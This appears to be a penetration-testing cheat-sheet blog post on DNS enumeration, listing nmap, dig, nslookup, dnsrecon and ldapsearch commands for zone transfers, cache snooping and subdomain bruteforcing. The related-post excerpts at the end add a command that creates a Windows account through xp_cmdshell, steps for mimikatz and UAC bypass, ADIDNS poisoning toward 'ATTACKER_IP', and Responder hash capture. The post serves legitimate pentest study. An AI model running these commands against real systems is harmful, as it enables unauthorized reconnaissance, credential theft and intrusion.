Skip to main content

DNS Enumeration - Port 53

 


#Find the DNS server 
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16

nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p53 10.10.10.10
#DNS Server Processes Unauthoritative Recursive Queries
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10
#DNS Server Cache Snooping Remote Information Disclosure
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10
#DNS Enum via Metasploit
auxiliary/gather/enum_dns

auxiliary/scanner/dns/dns_amp
# DNS Enum 

nslookup
>SERVER 10.10.10.1
# Give the ip address of the server to find its hostname 
> 10.10.10.10 
10.10.10.10.in-addr.arpa      name = host02.test.domain.

dig axfr host02.test.domain @10.10.10.1
#Find the Domain Name of the DC
ldapsearch -x -h "10.10.10.1" -s base

#Find some info or creds
ldapsearch -LLL -x -H ldap://DOMAIN.FQDN.COM -b '' -s base '(objectclass=*)'
Dns Enum via DIG 
dig @[server] [name] [type] Dig -t SRV _gc._tcp.<domain fqdn> Dig -t SRV _ldap._tcp.<domain fqdn> Dig -t SRV _kerberos._tcp.<domain fqdn> Dig -t SRV _kpasswd._tcp.<endpoint fqdn> nmap --script dns-srv-enum --script-args "dns-srv-enum.domain"='DOMAIN.FQDN.COM'
DNS Zone transfer 

#To get dig to perform a zone transfer, we invoke it with the -t AXFR notation as
dig @[server] [domain] -t AXFR

#Pull all information about a given domain. Alternatively, dig can perform an incremental zone transfer, pulling only recently updated records, using this syntax:
#N is an integer that refers to the serial number of a Start of Authority record
dig @[server] [domain] -t IXFR=[N]
DNSRecon Cheatsheet

#List all the DNS entries in the domain dnsrecon -r "10.10.0.0/16"
#Scan a domain
dnsrecon -d hackingdream.net

# -t = standard DNS records (default),
#reverse IP address lookup(rvl),
#zone transfers(axfr),
#DNSSEC zone walks (zonewalk), and
#cache nooping(snoop)

dnsrecon -d domain.FQDN -t type

#Displays S0A, NS, A, AAAA, MX, and SRV of the target domain
dnsrecon -d [domain]

#Performs reverse DNS lookup for IP address or CIDR range
dnsrecon -d [domain] -t rvl

#Attempts a zone transfer of all NS record nameservers
dnsrecon -d [domain] -t axfr

#Performs a DNSSEC zone walk by querying for NSEC records

dnsrecon -d [domain] -t zonewalk

#Scans for DNS cache snooping using a supplied dictionary file
dnsrecon -d [domain] -t snoop -D [dictionary file]

#Bruteforcing DNS sub-domains dnsrecon -d 10.10.10.1 -t brt -D /usr/share/wordlists/dnsmap.txt dnsenum domain.fqdn.com fierce -dns
domain.fqdn.com -wordlist dictionary.txt
Can also use DNSDumpster --> Online tool to identify DNS records

- Check for all the DNS records/Sub-Domains
- MX records usually show the email service provider details (outlook or whatever service they are using)
DNS Zone Transfer
host -la $DOMAIN. $DNSSERVER perl fierce.pl -dns $DOMAIN. -search $HOST dig axfr $TARGET @$DNSSERVER dnsrecon -d $DOMAIN -t axfr
 






Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/